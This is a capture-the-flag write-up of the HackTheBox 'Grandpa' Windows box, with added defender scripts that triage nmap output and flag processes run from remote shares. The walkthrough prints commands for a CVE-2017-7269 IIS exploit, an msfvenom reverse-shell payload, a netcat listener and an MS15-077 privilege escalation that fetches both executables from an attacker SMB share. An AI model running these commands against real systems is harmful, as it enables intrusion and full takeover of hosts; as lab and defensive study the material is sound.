Grandpa
An easy Windows box from HackTheBox: initial access comes from RCE against a vulnerable version of IIS, and privilege escalation from a kernel exploit.
Recon
Running the usual nmap scan:
sudo nmap -sC -sV -oA nmap/init 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 18 Sep 2022 22:53:00 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
This looks like a similar box to Grandma, with all the WebDAV HTTP methods advertised; however, after spending some time trying, there is just no write access at all, so a web shell is not possible.
Instead, try a remote exploit against IIS 6.0:
searchsploit iis 6.0
...
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
windows/remote/41738.py
...
This looks promising: remote code execution via shellcode carried in a WebDAV request.
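From the defender's side, the recon output above already gives enough to triage the host: the banner says IIS 6.0 (end-of-life), WebDAV methods are reachable, and the method lists show which content-modifying verbs are actually allowed for the resource versus merely advertised. The script below is an added example (not part of the original writeup or of any tool it mentions) that parses nmap -sC output in the shape shown above and emits findings for exactly those conditions. The sample scan text is constructed to mirror the writeup's output; the finding codes and thresholds are my own.

```python
# Triage nmap -sC http-methods / http-webdav-scan output for an IIS 6.0 host.
# Added example; the sample below is constructed from the scan shown in the writeup.

SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 18 Sep 2022 22:53:00 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Verbs that change content on the server (relevant for web-shell upload).
MODIFY_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}


def _methods(fragment, sep):
    """Split a method list on `sep`, normalising case and whitespace."""
    return {m.strip().upper() for m in fragment.split(sep) if m.strip()}


def parse_scan(text):
    """Pull the server banner and the three method lists out of one nmap port block."""
    info = {"server": None, "risky": set(), "public": set(), "allowed": set()}
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()          # drop nmap's script-output prefix
        if line.startswith("http-server-header:"):
            info["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("Potentially risky methods:"):
            info["risky"] = _methods(line.split(":", 1)[1], " ")
        elif line.startswith("Public Options:"):
            info["public"] = _methods(line.split(":", 1)[1], ",")
        elif line.startswith("Allowed Methods:"):
            info["allowed"] = _methods(line.split(":", 1)[1], ",")
    return info


def assess(info):
    """Return (code, message) findings, most severe first."""
    findings = []
    server = info["server"] or ""
    iis6 = server.startswith("Microsoft-IIS/6.")
    if iis6:
        findings.append(("EOL_IIS6",
                         "IIS 6.0 / Windows Server 2003 is end-of-life; no vendor patches ship"))
    if iis6 and "PROPFIND" in info["allowed"]:
        findings.append(("CVE-2017-7269",
                         "WebDAV PROPFIND reachable on IIS 6.0 (ScStoragePathFromUrl overflow); "
                         "disable WebDAV or decommission the host"))
    modify_allowed = sorted(info["allowed"] & MODIFY_METHODS)
    if modify_allowed:
        findings.append(("MODIFY_ALLOWED",
                         "content-modifying methods allowed for this resource: "
                         + ", ".join(modify_allowed) + "; verify IIS and NTFS write permissions"))
    # Advertised in Public Options but absent from Allowed Methods: this is the
    # gap that leaves an attacker without upload even though PUT is 'supported'.
    advertised_only = sorted((info["public"] & MODIFY_METHODS) - info["allowed"])
    if advertised_only:
        findings.append(("ADVERTISED_ONLY",
                         "advertised but not allowed for this resource: "
                         + ", ".join(advertised_only)))
    return findings


if __name__ == "__main__":
    for code, msg in assess(parse_scan(SAMPLE_NMAP)):
        print(f"[{code}] {msg}")
```

Note that for the sample the only modifying verb in Allowed Methods is COPY, while PUT, MKCOL, MOVE and DELETE appear only in Public Options; that matches the writeup's experience of finding no write access despite the long list of "risky" methods.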
Exploitation
The exploit from searchsploit didn't work, so I had to go digging around for different versions of the exploit for the same CVE (CVE-2017-7269).
I finally found this one, which worked out of the box.
Firing it at the server with a listener set up on port 9001 gives a reverse shell:
python2 exploit.py 10.10.10.15 80 KALI_IP 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
Then, running systeminfo and feeding the output to wesng, I find that the box is very vulnerable, with lots of privesc possibilities.
I opted to use MS15-077, running both the privesc executable and the reverse shell from an SMB share. First, generate the reverse shell payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > rev.exe
Set up a reverse listener:
rlwrap nc -lnvp 4444
And expose the executables using the smbserver script again:
smbserver.py share .
Then, on the victim:
c:\windows\system32\inetsrv>\\10.10.14.5\share\elevator.exe \\10.10.14.5\share\rev.exe
And get root (SYSTEM)!
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.14] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\system
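The privesc step above has a very visible footprint: a shell running under the IIS worker's identity launches an executable straight from a remote UNC share, with a second UNC path as its argument. The script below is an added detection example (not from the writeup or from any tool it mentions) that runs over process-creation records and flags images or arguments loaded from UNC paths and processes spawned by the IIS worker. The record shape (image, command_line, parent_image, user) is assumed rather than taken from any specific log format, and the sample events are constructed to resemble this box's activity, including the assumption that on IIS 6.0 the shellcode's cmd.exe is a child of w3wp.exe.

```python
import ntpath
import re

# Matches \\host\share\path... (UNC paths); tolerates trailing components.
UNC_RE = re.compile(r'\\\\[\w.\-]+\\[^\s"\\]+(?:\\[^\s"\\]+)*')

# IIS worker / server processes that should not normally spawn shells.
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe"}

# Constructed process-creation records; field names are this example's own.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "user": "NT AUTHORITY\\NETWORK SERVICE"},
    {"image": r"\\10.10.14.5\share\elevator.exe",
     "command_line": r"\\10.10.14.5\share\elevator.exe \\10.10.14.5\share\rev.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "user": "NT AUTHORITY\\NETWORK SERVICE"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe report.txt",
     "parent_image": r"C:\Windows\explorer.exe",
     "user": "CORP\\alice"},
]


def analyze(event):
    """Return reasons this process-creation event looks like remote-share execution."""
    reasons = []
    unc_paths = UNC_RE.findall(event["command_line"])
    if UNC_RE.match(event["image"]):
        reasons.append("IMAGE_FROM_UNC")          # binary itself lives on a remote share
    if unc_paths:
        reasons.append("UNC_IN_CMDLINE")          # arguments reference remote shares
    if ntpath.basename(event["parent_image"]).lower() in WEB_WORKERS:
        reasons.append("SPAWNED_BY_WEB_WORKER")   # web server process started a child
    severity = "none"
    if reasons:
        severity = "high" if "IMAGE_FROM_UNC" in reasons or "SPAWNED_BY_WEB_WORKER" in reasons else "medium"
    return {"severity": severity, "reasons": reasons, "unc_paths": unc_paths}


def scan(events):
    """Yield (index, analysis) for every event that produced at least one reason."""
    hits = []
    for i, event in enumerate(events):
        result = analyze(event)
        if result["reasons"]:
            hits.append((i, result))
    return hits


if __name__ == "__main__":
    for i, res in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"#{i} {res['severity']:<6} {ev['user']} {ev['image']} <- {ev['parent_image']}")
        print(f"    reasons={res['reasons']} unc={res['unc_paths']}")
```

Blocking outbound SMB (445/tcp) from a web tier to arbitrary hosts removes this whole technique, and the same rules catch the earlier web-shell-style cases: a child of w3wp.exe is suspicious regardless of what it runs.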